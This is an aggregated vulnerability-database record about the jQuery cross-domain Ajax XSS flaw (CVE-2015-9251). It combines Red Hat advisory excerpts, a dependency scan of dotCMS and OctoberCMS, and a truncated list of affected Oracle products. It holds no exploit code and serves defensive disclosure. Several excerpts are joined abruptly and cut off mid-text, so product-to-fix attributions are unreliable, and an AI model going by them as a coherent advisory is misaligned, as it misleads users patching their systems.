"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
}
],
"trust": 0.6
}
}
VAR-201801-0036
Vulnerability from variot - Updated: 2026-03-09 20:29jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions prior to 3.0.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23926 - Tracker bug for the EAP 7.4.9 release for RHEL-7 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
-
1879604 - pkispawn logs files are empty
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: ipa security, bug fix, and enhancement update Advisory ID: RHSA-2020:3936-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:3936 Issue date: 2020-09-29 CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040 CVE-2018-14042 CVE-2018-20676 CVE-2018-20677 CVE-2019-8331 CVE-2019-11358 CVE-2020-1722 CVE-2020-11022 ==================================================================== 1. Summary:
An update for ipa is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
- Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
The following packages have been upgraded to a later upstream version: ipa (4.6.8). (BZ#1819725)
Security Fix(es):
-
js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
bootstrap: XSS in the data-target attribute (CVE-2016-10735)
-
bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
-
bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip. (CVE-2018-14042)
-
bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)
-
bootstrap: XSS in the affix configuration target property (CVE-2018-20677)
-
bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
-
js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
ipa: No password length restriction leads to denial of service (CVE-2020-1722)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests 1404770 - ID Views: do not allow custom Views for the masters 1545755 - ipa-replica-prepare should not update pki admin password. 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip. 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701972 - CVE-2019-11358 js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection 1754902 - Running ipa-server-install fails when RHEL 7.7 packages are installed on RHEL 7.6 1755535 - ipa-advise on a RHEL7 IdM server is not able to generate a configuration script for a RHEL8 IdM client 1756568 - ipa-server-certinstall man page does not match built-in help. 1758406 - KRA authentication fails when IPA CA has custom Subject DN 1769791 - Invisible part of notification area in Web UI intercepts clicks of some page elements 1771356 - Default client configuration breaks ssh in FIPS mode. 1780548 - Man page ipa-cacert-manage does not display correctly on RHEL 1782587 - add "systemctl restart sssd" to warning message when adding trust agents to replicas 1788718 - ipa-server-install incorrectly setting slew mode (-x) when setting up ntpd 1788907 - Renewed certs are not picked up by IPA CAs 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1795890 - ipa-pkinit-manage enable fails on replica if it doesn't host the CA 1801791 - Compatibility Schema difference in functionality for systems following RHEL 7.5 -> 7.6 upgrade path as opposed to new RHEL 7.6 systems 1817886 - ipa group-add-member: prevent adding IPA objects as external members 1817918 - Secure tomcat AJP connector 1817919 - Enable compat tree to provide information about AD users and groups on trust agents 1817922 - covscan memory leaks report 1817923 - IPA upgrade is failing with error "Failed to get request: bus, object_path and dbus_interface must not be None." 1817927 - host-add --password logs cleartext userpassword to Apache error log 1819725 - Rebase IPA to latest 4.6.x version 1825829 - ipa-advise on a RHEL7 IdM server generate a configuration script for client having hardcoded python3 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1829787 - ipa service-del deletes the required principal when specified in lower/upper case 1834385 - Man page syntax issue detected by rpminspect 1842950 - ipa-adtrust-install fails when replica is offline
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ipa-4.6.8-5.el7.src.rpm
noarch: ipa-client-common-4.6.8-5.el7.noarch.rpm ipa-common-4.6.8-5.el7.noarch.rpm ipa-python-compat-4.6.8-5.el7.noarch.rpm python2-ipaclient-4.6.8-5.el7.noarch.rpm python2-ipalib-4.6.8-5.el7.noarch.rpm
x86_64: ipa-client-4.6.8-5.el7.x86_64.rpm ipa-debuginfo-4.6.8-5.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ipa-server-common-4.6.8-5.el7.noarch.rpm ipa-server-dns-4.6.8-5.el7.noarch.rpm python2-ipaserver-4.6.8-5.el7.noarch.rpm
x86_64: ipa-debuginfo-4.6.8-5.el7.x86_64.rpm ipa-server-4.6.8-5.el7.x86_64.rpm ipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ipa-4.6.8-5.el7.src.rpm
noarch: ipa-client-common-4.6.8-5.el7.noarch.rpm ipa-common-4.6.8-5.el7.noarch.rpm ipa-python-compat-4.6.8-5.el7.noarch.rpm python2-ipaclient-4.6.8-5.el7.noarch.rpm python2-ipalib-4.6.8-5.el7.noarch.rpm
x86_64: ipa-client-4.6.8-5.el7.x86_64.rpm ipa-debuginfo-4.6.8-5.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ipa-server-common-4.6.8-5.el7.noarch.rpm ipa-server-dns-4.6.8-5.el7.noarch.rpm python2-ipaserver-4.6.8-5.el7.noarch.rpm
x86_64: ipa-debuginfo-4.6.8-5.el7.x86_64.rpm ipa-server-4.6.8-5.el7.x86_64.rpm ipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ipa-4.6.8-5.el7.src.rpm
noarch: ipa-client-common-4.6.8-5.el7.noarch.rpm ipa-common-4.6.8-5.el7.noarch.rpm ipa-python-compat-4.6.8-5.el7.noarch.rpm ipa-server-common-4.6.8-5.el7.noarch.rpm ipa-server-dns-4.6.8-5.el7.noarch.rpm python2-ipaclient-4.6.8-5.el7.noarch.rpm python2-ipalib-4.6.8-5.el7.noarch.rpm python2-ipaserver-4.6.8-5.el7.noarch.rpm
ppc64: ipa-client-4.6.8-5.el7.ppc64.rpm ipa-debuginfo-4.6.8-5.el7.ppc64.rpm
ppc64le: ipa-client-4.6.8-5.el7.ppc64le.rpm ipa-debuginfo-4.6.8-5.el7.ppc64le.rpm
s390x: ipa-client-4.6.8-5.el7.s390x.rpm ipa-debuginfo-4.6.8-5.el7.s390x.rpm
x86_64: ipa-client-4.6.8-5.el7.x86_64.rpm ipa-debuginfo-4.6.8-5.el7.x86_64.rpm ipa-server-4.6.8-5.el7.x86_64.rpm ipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ipa-4.6.8-5.el7.src.rpm
noarch: ipa-client-common-4.6.8-5.el7.noarch.rpm ipa-common-4.6.8-5.el7.noarch.rpm ipa-python-compat-4.6.8-5.el7.noarch.rpm ipa-server-common-4.6.8-5.el7.noarch.rpm ipa-server-dns-4.6.8-5.el7.noarch.rpm python2-ipaclient-4.6.8-5.el7.noarch.rpm python2-ipalib-4.6.8-5.el7.noarch.rpm python2-ipaserver-4.6.8-5.el7.noarch.rpm
x86_64: ipa-client-4.6.8-5.el7.x86_64.rpm ipa-debuginfo-4.6.8-5.el7.x86_64.rpm ipa-server-4.6.8-5.el7.x86_64.rpm ipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-9251 https://access.redhat.com/security/cve/CVE-2016-10735 https://access.redhat.com/security/cve/CVE-2018-14040 https://access.redhat.com/security/cve/CVE-2018-14042 https://access.redhat.com/security/cve/CVE-2018-20676 https://access.redhat.com/security/cve/CVE-2018-20677 https://access.redhat.com/security/cve/CVE-2019-8331 https://access.redhat.com/security/cve/CVE-2019-11358 https://access.redhat.com/security/cve/CVE-2020-1722 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX3Of/9zjgjWX9erEAQjmHBAAi+u4CgMbaduuYvMAMbNKqT/0X8Y02udQ maW4rfZ6udfHWJ21h1VlD/INXHB3sBFC2vpXsgJD7dTkUsZYIx73LrQFkakTzIWc xSQalxNs+Fjh/ot/JMiKQzQUmZeu/vUYgVB81y+hczg5dys3q1mnu42GWe18sJIc FCY2R3mBTnFUZoc/3JDHeVRJU8eq51oqRgNaz+Fl+CoFkR81P6mD8wybIIAsBx14 Ykya/awQf+OuBCe5tqfTV1+KS2U4+tqiqapzALt7dhjfA9Jayc9/UvQjGCyrmGvP +BBBPSqGOS81jpPo0ouM3OtadWrGAWERMwtrR+POUp1rnMxy2kI0EpebnzSOtJy2 xExPZtcTjjgWvIMDdrJJ5DXG6cP5j3GjyvFknmCtCqvXzo90gw73psi6roG+g/a8 UyML+be8jnJK7571X3dz6OCYBExaHqM21ukUEfdvddszhw92J3fxmDm5+picETB9 dZ++VtV1lCBOlKW1SDG/ggk7PeSRGTDL5IkekopO1w89r3QsfqyFudlsNT0dDgk7 8Kzn8YpCWln1Kp0UbVushKRT+KllZRTKzXTBfiEWiYtQiwyL9zj/DrxagXXbiPe7 5mZnk62sAdKya3On4ejgPQ8Nq8oKHzRfaig/CNaNiB00HgZcRdQokPQ9+DRnkdNS UR3S5ZAZvb8=SWQt -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Hello,
I identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable open source dependencies. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
-
HTTP/2: flood using PRIORITY frames results in excessive resource consumption (CVE-2019-9513)
-
HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
-
HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
-
HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)
-
HTTP/2: request for large response leads to denial of service (CVE-2019-9517)
-
HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518)
-
infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174)
-
spring-security-core: mishandling of user passwords allows logging in with a password of NULL (CVE-2019-11272)
-
jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution (CVE-2019-12384)
-
jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379)
-
xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response (CVE-2019-17570)
-
js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929)
-
js-jquery: XSS in responses from cross-origin ajax requests (CVE-2017-16012)
-
apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip (CVE-2018-11771)
-
spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher (CVE-2019-3802)
-
undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
-
shiro: Cookie padding oracle vulnerability with default configuration (CVE-2019-12422)
-
jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
Installation instructions are available from the Fuse 7.6.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/
- Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests 1432858 - CVE-2017-5929 logback: Serialization vulnerability in SocketServer and ServerSocketReceiver 1591854 - CVE-2017-16012 js-jquery: XSS in responses from cross-origin ajax requests 1618573 - CVE-2018-11771 apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip 1643043 - CVE-2018-15756 springframework: DoS Attack via Range Requests 1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed 1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods 1709860 - CVE-2019-5427 c3p0: loading XML configuration leads to denial of service 1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes 1725795 - CVE-2019-12814 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. 1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution 1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL 1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher 1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth 1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption 1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth 1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth 1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption 1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution 1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service 1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service 1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI 1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration 1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response
- OctoberCMS is a CMS similar to WordPress, but with much less “fluff”. SECURELI.com's team identified the latest version of OctoberCMS relying on Bootstrap 3.3.7, jQuery 1.11.1, and jQuery 3.3.1. All of these dependencies are vulnerable.
/october/themes/demo/assets/vendor/bootstrap.js
bootstrap 3.3.7 has known vulnerabilities severity: high issue: 28236 summary: XSS in data-template, data-content and data-title properties of tooltip/popover
CVE-2019-8331 https://github.com/twbs/bootstrap/issues/28236 severity: medium issue: 20184 summary: XSS in data-target property of scrollspy
CVE-2018-14041 https://github.com/twbs/bootstrap/issues/20184 severity: medium issue: 20184 summary: XSS in collapse data-parent attribute
CVE-2018-14040 https://github.com/twbs/bootstrap/issues/20184 severity: medium issue: 20184 summary: XSS in data-container property of tooltip
CVE-2018-14042 https://github.com/twbs/bootstrap/issues/20184
/october/themes/demo/assets/vendor/jquery.js
jquery 1.11.1 has known vulnerabilities severity: medium issue: 2432 summary: 3rd party CORS request may execute
CVE-2015-9251
https://github.com/jquery/jquery/issues/2432 http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/ https://nvd.nist.gov/vuln/detail/CVE-2015-9251 http://research.insecurelabs.org/jquery/test/ severity: medium
CVE-2015-9251 issue: 11974 summary: parseHTML() executes scripts in event handlers
https://bugs.jquery.com/ticket/11974 https://nvd.nist.gov/vuln/detail/CVE-2015-9251 http://research.insecurelabs.org/jquery/test/ severity: low
CVE-2019-11358 summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, …) because of Object.prototype pollution
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/ https://nvd.nist.gov/vuln/detail/CVE-2019-11358 https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
/october/modules/backend/assets/js/vendor/jquery-and-migrate.min.js
jquery 3.3.1 has known vulnerabilities severity: low
CVE-2019-11358 summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, …) because of Object.prototype pollution
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/ https://nvd.nist.gov/vuln/detail/CVE-2019-11358 https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
All of these vulnerabilities were identified using RetireJS (https://retirejs.github.io/retire.js/), which identifies open source dependency vulnerabilities.
Research provided by SECURELI.com
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.3.1"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.2"
},
{
"_id": null,
"model": "endeca information discovery studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "hospitality guest access",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.2.1"
},
{
"_id": null,
"model": "hospitality materials control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.1"
},
{
"_id": null,
"model": "hospitality cruise fleet management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0.11"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.5"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.55"
},
{
"_id": null,
"model": "utilities framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.4"
},
{
"_id": null,
"model": "service bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "oss support tools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "retail customer insights",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.0"
},
{
"_id": null,
"model": "fusion middleware mapviewer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "enterprise operations monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.1.0"
},
{
"_id": null,
"model": "hospitality guest access",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.2.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.2"
},
{
"_id": null,
"model": "financial services reconciliation framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.3.0"
},
{
"_id": null,
"model": "communications converged application server",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0.0.1"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.1.0"
},
{
"_id": null,
"model": "financial services reconciliation framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.5"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.2"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.2.0"
},
{
"_id": null,
"model": "endeca information discovery studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.1.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.10"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail customer insights",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.1"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.5"
},
{
"_id": null,
"model": "hospitality reporting and analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1.0"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.5"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.1"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.0.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.4"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "utilities mobile workforce management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.3.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
